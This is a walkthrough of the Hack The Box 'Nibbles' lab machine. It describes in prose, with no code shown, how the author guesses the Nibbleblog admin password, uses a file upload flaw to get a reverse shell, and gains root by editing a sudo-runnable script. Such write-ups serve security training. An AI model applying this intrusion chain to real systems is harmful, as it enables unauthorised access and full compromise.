HackTheBox “Nibbles” Walkthrough
Nibbles is a beginner-friendly Linux machine on the Hack The Box platform. The exploit path involves exploiting an arbitrary file upload vulnerability in the My Image plugin of the Nibbleblog web application. This vulnerability can be used to upload a reverse shell, which gives the attacker a command-line interface on the target machine. Once the attacker has a reverse shell, they can escalate their privileges to root by exploiting a script with sudo permissions.
Let’s get started!🚀
Recon & Enumeration
Let’s use nmap to scan for open ports and services:
The web page returns a “hello world” message:
However, checking the source code provides a clue as to where to go next.
A blank instance of the Nibbleblog blogging software is available at the /nibbleblog/ path.
Let’s run a Dirsearch tool scan to see what other pages are available.
Try at /nibbleblog/
The /nibbleblog/content path is interesting, as it has directory listings enabled. This means that we can see the contents of the directory without having to login or authenticate.
Continuing our exploration, we find a page at /nibbleblog/content/private/user.xml which reveals a user named admin.
And below is the content of the users.xml file
The Dirsearch tool scan also revealed a path /admin.php, which presents a login page.
Nibbleblog does not have a default password. Fortunately, the guess of nibbles worked, and we were able to log in.
The Dirsearch tool scan also revealed a README directory, which provides us with the version of Nibbleblog that is running on the target.
Let’s conduct some research on this.
Exploitation:
The nibbleblog version 4.0.3 has a vulnerability known as CVE-2015–6967. This vulnerability allows authenticated users to upload arbitrary files, which can result in the execution of malicious code. Exploiting this vulnerability can be done either using a Metasploit module or manually, as it is relatively straightforward.
W/ Metasploit:
Based on Google research, let use Metasploit module below
We’ll use multi/http/nibbleblog_file_upload and set the required options
Run
W/O Metasploit:
Back to the /admin.php page.
Upon exploring the page tabs, it becomes apparent that we can perform an image file upload by navigating to the “Plugins” tab and subsequently accessing the “My images” directory.
After conducting a search for a reverse shell payload that can be uploaded as an image file, we get the payload here:
Download it to our attack box.
Upon reviewing the payload, we need to modify the payload by replacing the IP address and port with the corresponding values of our attack box. We have made these changes as shown in the screenshot below and renamed the payload as “photo.php”.
Upload it to the target.
To confirm the successful upload, we conducted directory busting and identified the “/nibbleblog/content/private” directory.
This location appears to be the designated area for uploaded images. Upon inspection, we discovered that there is only one file named “image.php” with a recent modification date.
Run a listener on our attack box.
After triggering the image.php file, we get a shell back to our listener.
After surfing through the machine, we can see that we have limited access rights. Trying to escalate our privileges, we can see that we can run the script below as sudo with nopassword.
Check the script.
We needed to unzip personal.zip foler.
Check the content of the script.
let’s tail the “monitor.sh” bash script with a reverse shell command to our attack box.
Run a listener accordingly on our attack box.
Run the script in sudo.
And we get back a root shell.
Cheers.
